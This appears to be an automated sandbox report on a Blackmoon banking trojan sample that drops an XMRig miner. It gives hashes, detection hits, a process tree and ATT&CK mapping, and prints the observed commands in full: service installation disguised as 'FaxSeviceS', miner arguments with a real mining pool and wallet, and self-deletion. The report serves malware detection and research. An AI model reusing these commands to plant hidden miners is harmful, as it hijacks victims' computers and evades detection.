blackmoon | 782447e2740c78068a02e88f56f4ee2150116b7c182a96c9ca5a64ea1722062d

General

Target

56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe
Size

3.4MB
MD5

56967654bccafc5fe7bcfc649134c1b0
SHA1

536a3c80f0fd24c06ba09a137775d6fff7752a47
SHA256

782447e2740c78068a02e88f56f4ee2150116b7c182a96c9ca5a64ea1722062d
SHA512

a21250ac8134c3bbf79fe7d6352567c06532939ca88457606918a2d2ecc7029ded669535b88684e8205f9dfab8328253cc2da9496f6205f4a8d26c6c7124cb92
SSDEEP

98304:Se8KlkOGyXa8b2SLXUcd1r6mrPjyM8bOV1vXTsDxJzJmsLHJ:yInlb2OImjn5spNTJ

Score

10^/10

blackmoon xmrig banker miner trojan upx

Malware Config

Signatures

Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp	family_blackmoon
behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp	family_blackmoon
behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp	family_blackmoon

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp	xmrig
behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp	xmrig
C:\Users\Admin\AppData\Local\Temp\System	xmrig
behavioral2/memory/4280-18-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-20-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp	xmrig
behavioral2/memory/4280-25-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-26-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-27-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-28-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-29-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-30-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-31-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-32-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-33-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig
behavioral2/memory/4280-34-0x0000000000400000-0x0000000000931000-memory.dmp	xmrig

Executes dropped EXE 7 IoCs

Processes:

Process.exeProcess.exeProcess.exeProcess.exeProcess.exeProcess.exeSystem

pid process

3576 Process.exe
3676 Process.exe
4108 Process.exe
1428 Process.exe
2468 Process.exe
3976 Process.exe
4280 System

pid	process
3576	Process.exe
3676	Process.exe
4108	Process.exe
1428	Process.exe
2468	Process.exe
3976	Process.exe
4280	System

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1372-0-0x0000000000400000-0x0000000000FBB000-memory.dmp	upx
behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp	upx
behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp	upx
behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp	upx

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3696 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3584 PING.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exeSystem

description pid process

Token: SeDebugPrivilege 3696 taskkill.exe
Token: SeLockMemoryPrivilege 4280 System
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe

pid process

1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe

pid	process
3696	taskkill.exe

pid	process
3584	PING.EXE

description	pid	process
Token: SeDebugPrivilege	3696	taskkill.exe
Token: SeLockMemoryPrivilege	4280	System

pid	process
1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.execmd.exeProcess.exe

description	pid	process	target process
PID 1372 wrote to memory of 3616	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe
PID 1372 wrote to memory of 3616	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe
PID 1372 wrote to memory of 3616	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe
PID 3616 wrote to memory of 3584	3616	cmd.exe	PING.EXE
PID 3616 wrote to memory of 3584	3616	cmd.exe	PING.EXE
PID 3616 wrote to memory of 3584	3616	cmd.exe	PING.EXE
PID 1372 wrote to memory of 3696	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	taskkill.exe
PID 1372 wrote to memory of 3696	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	taskkill.exe
PID 1372 wrote to memory of 3696	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	taskkill.exe
PID 1372 wrote to memory of 3576	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 3576	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 3676	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 3676	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 4108	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 4108	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 1428	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 1428	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 2468	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 1372 wrote to memory of 2468	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	Process.exe
PID 3976 wrote to memory of 4280	3976	Process.exe	System
PID 3976 wrote to memory of 4280	3976	Process.exe	System
PID 1372 wrote to memory of 664	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe
PID 1372 wrote to memory of 664	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe
PID 1372 wrote to memory of 664	1372	56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ping 114.114.114.114
2⤵
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\SysWOW64\PING.EXE
ping 114.114.114.114
3⤵
- Runs ping.exe
PID:3584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ftp.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Users\Admin\AppData\Local\Temp\Process.exe
"C:\Users\Admin\AppData\Local\Temp\Process.exe" stop FaxSeviceS
2⤵
- Executes dropped EXE
PID:3576

C:\Users\Admin\AppData\Local\Temp\Process.exe
"C:\Users\Admin\AppData\Local\Temp\Process.exe" remove FaxSeviceS confirm
2⤵
- Executes dropped EXE
PID:3676

C:\Users\Admin\AppData\Local\Temp\Process.exe
"C:\Users\Admin\AppData\Local\Temp\Process.exe" install FaxSeviceS "C:\Users\Admin\AppData\Local\Temp\System"
2⤵
- Executes dropped EXE
PID:4108

C:\Users\Admin\AppData\Local\Temp\Process.exe
"C:\Users\Admin\AppData\Local\Temp\Process.exe" set FaxSeviceS AppParameters -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin --max-cpu-usage 80 --donate-level 1
2⤵
- Executes dropped EXE
PID:1428

C:\Users\Admin\AppData\Local\Temp\Process.exe
"C:\Users\Admin\AppData\Local\Temp\Process.exe" start FaxSeviceS
2⤵
- Executes dropped EXE
PID:2468

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe"
2⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\Process.exe
C:\Users\Admin\AppData\Local\Temp\Process.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3976

C:\Users\Admin\AppData\Local\Temp\System
"C:\Users\Admin\AppData\Local\Temp\System" -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin --max-cpu-usage 80 --donate-level 1
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Process.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\System

Filesize
5.1MB

MD5
ca6e129ab95d5e2d1faebddb224e4a79

SHA1
cdda703f24235a92b7963c7f18e944e32a4be23f

SHA256
3740d118e0d91c1c27d7c36173e14143a0be294a08771d6aa1c2f3e996487f21

SHA512
096221b68bf193492312ad7d61abfacc81ff3df30bb59fb57cbf5e2764499a4e51155811a4a6c6bbbd197eb70a0303ba06d2276eb7f4f2ebc449d0461261a5dd

Download Submit
memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp

Filesize
11.7MB

Download
memory/1372-0-0x0000000000400000-0x0000000000FBB000-memory.dmp

Filesize
11.7MB

Download
memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp

Filesize
11.7MB

Download
memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp

Filesize
11.7MB

Download
memory/4280-27-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-20-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-18-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-25-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-26-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-16-0x0000000000B50000-0x0000000000B60000-memory.dmp

Filesize
64KB

Download
memory/4280-28-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-29-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-30-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-31-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-32-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-33-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download
memory/4280-34-0x0000000000400000-0x0000000000931000-memory.dmp

Filesize
5.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads